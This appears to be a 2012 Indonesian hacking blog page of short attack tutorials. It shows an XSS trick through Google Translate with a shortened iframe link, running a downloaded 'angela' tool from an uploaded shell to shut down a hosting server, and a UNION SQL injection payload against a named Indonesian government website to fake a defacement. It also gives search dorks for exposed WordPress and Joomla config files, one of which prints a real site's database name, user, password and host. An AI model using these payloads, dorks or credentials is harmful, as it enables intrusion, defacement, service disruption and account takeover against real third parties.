Kamis, 23 Februari 2012

Xss vuln google

0 Selengkapnya
hmmm tadi gk sengaja neh jalan² ke forum sebelah eehh ada yang aneh :))
sesuai dengan judul xss vuln google ??? why ? emang nya bisa apa ?? kagak percaya ya ok deh tanpa
basa basi :P
bagian yg vuln pada google translate ialah terletak pada link berikut:
http://translate.google.com/translate?sl=es&tl=en&u=

setelah huruf u kita bisa menginfeksi sebuah script xss, tapi weitzzzz.. ntar dulu om .. gak bisa main tusbol gitu aja.. gak percaya coba aja test pasti gak bisa..
hahaha.. ada trik nya om mas beroh..
di sinilah kita bermain iframe dan url shortened.
pertama tama buat script html seperti berikut
 http://rhiby.com/xss.html

yang link di atas di CTRL+U aja bro ^_^ nah perhatikan di bagian ini
<iframe
src="http://bit.ly/xII4m7" align="middle" height="0"
width="0"></iframe></div>
</body>
 
nah yang link http://bit.ly/xII4m7
itu ganti dengan url shortened. yang di hostingan agan ya :) 
save ke hostingan or ke website kalian, kasih nama dengan xss.html
or terserah sesuai selera kalian deh :) 
contoh :
http//www.website.mu/file_tadi.html

anggap punya kalian kalau punya gue kan di sini
http://rhiby.com/xss.html

nah link tersebut kita pendekan pakai url shotter (pemendek url , gak perlu pakai tehnic mak erot untuk memanjang or memendekan itu loh).. bisa pakai .bit.ly , goo.gl , etc etc sesuai selera.
setelah jadi misal nya url nya menjadi
 http://bit.ly/xII4m7

ok sekarang kita kembali ke sekolah nya paman google, dan temui guru bahasa asing tadi: http://translate.google.com/translate?sl=es&tl=en&u=masukan_disini_linkurlkita_ygsudah_disunat_tadi



contoh punya saya neh gan
http://translate.google.com/translate?sl=es&tl=en&u=http://bit.ly/xII4m7

semoga bermanfaat ya buat kalian ^_^

Shutdown server hostingan

0 Selengkapnya
oke disini flazer kasih sedikit tutor cupu...ne tutor buat shutdown satu server hostingan....

oke pertama nte download dl ne
Klik Di Sini Download Nya
kita akan coba shutdown website forum hacker luar
nah kalau udah di download nte upload dishell....pasti dah paham kan cara uploadnya...

oke tahap kedua
kita mulai mengekstrak file angelanya... dengan perintah


tar angela.tgz
 
 
oke kalau udah selesai mengekstraknya kitalangsung lanjut... ke step 3
distep tiga ini kita masuk ke folder dimana file angela nya ne diupload!!!!
nah kalau udah masuk kefolder angelanya kemudian ketik perintah buat panggila file angelanya
 
./angela &


nah sekarng kita lihat hasilnya dimozilla & hasil di ping
ne hasil dimozzila
 
 
 ok selamat mencoba ya ^_^ salam dari newbie :D

Deface Palsu via SQL Injection !!!

0 Selengkapnya
halo all :) kali ini flazer mau kasih trik / toturial Deface Palsu via SQL Injection  ???
wiihh emang nya bisa ya hmmm ini sih seperti xss saja :D
jadi kita bermain dengan sql injection dulu :)
ok langsung aja ya ^_^
1. siapkan target sql kita dulu ^_^
udah tau kan sql itu gimana ??? kalau gk tau google aja gan
nah sekarang kita dapat target neh :D
http://dinhubkominfo.jatengprov.go.id/?v=nw&id=54

ok kita coba sql ya gan
http://dinhubkominfo.jatengprov.go.id/?v=nw&id=-54%20union%20select%201,2,3,4,5,6,7,8,9,10--

wahh ternyata ada no togel nya gan heheheh :P
sekarang kita ganti yang no 6 dengan asci kita ^_^
tahu kan convert asci nya ?? http://www.swingnote.com/tools/texttohex.php

ok sekarang kita coba buat kata ini <h1>Saya Hanya Seorang Lamer I AM NOT HACKER</h1>
nah yang dari <h1> sampai akhir kita coba convert ke asci ^_^

nah kalau sudah kita ambil hex nya jadi nya seperi ini
3c68313e536179612048616e79612053656f72616e67204c616d6572204920414d204e4f54204841434b45523c2f68313e

sekarang coba kita masukin ke angka 6 tadi 
 oia jangan lupa kalian tambahin ya 0x hasil hex kita 

jadi nya seperti ini
buka ganKLIK DI SINI

nah gimana sekarang :) udah paham kan ^_^ salam dari newbie kch ya by flazer
jangan lah menyerah untuk belajar T_T

WORDPRESS vulnerability DataBase

0 Selengkapnya
hmmm ketemu lagi ya dengan flazer yang ganteng ini

kali ini flazer mau berbagi lagi neh curi² DB [ database ] waahhhh keren

gimana ya cara nya ?? ok deh tanpa basa basi aja ya bro :D

dork :  allinurl:wp-config.txt

untuk contoh web nya seperti ini : http://ganjalicious.com/wp-config.txt

nah sekarang kita lihat di bagian ini

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'anjoe_wordpress_anjoe_site_aplus_net');

/** MySQL database username */
define('DB_USER', 'anjoesitea346032');

/** MySQL database password */
define('DB_PASSWORD', '8215');

/** MySQL hostname */
define('DB_HOST', 'sql5c40a.carrierzone.com');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
 
 
nah di bagian situ kan bisa di manfaatin ^_^ gunakan lah pikiran sehat untuk 
menjadi seorang hacker ^_^ maaf saya hanya lamer bukan hacker :)
semoga toturial ini bermanfaat  

Dork FTP akun

0 Selengkapnya
hey² kali ini flazer mau berbagi neh dork FTP akun fungsi nya buat apa ya
hmmm sebenar nya ftp akun ini bisa menanam shell bagaimana cara nya ??
hehehe mungkin buat para kk master pasti tau donk cara nya menggunakan filezila
ok langsung aja deh kita coba dork nya
DORK : <?php class JConfig { var $offline ftp = filetype:txt


nah dork di atas itu bisa di gunakan loohh ^_^ lumayan buat titip shell :P
hehehhe maklum newbie cuman bisa begini aja gan :(
gk bisa yang lain nasib lamer seperti saya ya cuman bisa main beginian 
saat nya mencoba ya 

semoga toturial dari saya ini bermanfaat ^_^
 
© Copyright 2011 : Zone Crew
Template dari : Free Blogger Templates | ZonaBlogger.com | Didukung Oleh : Blogger.com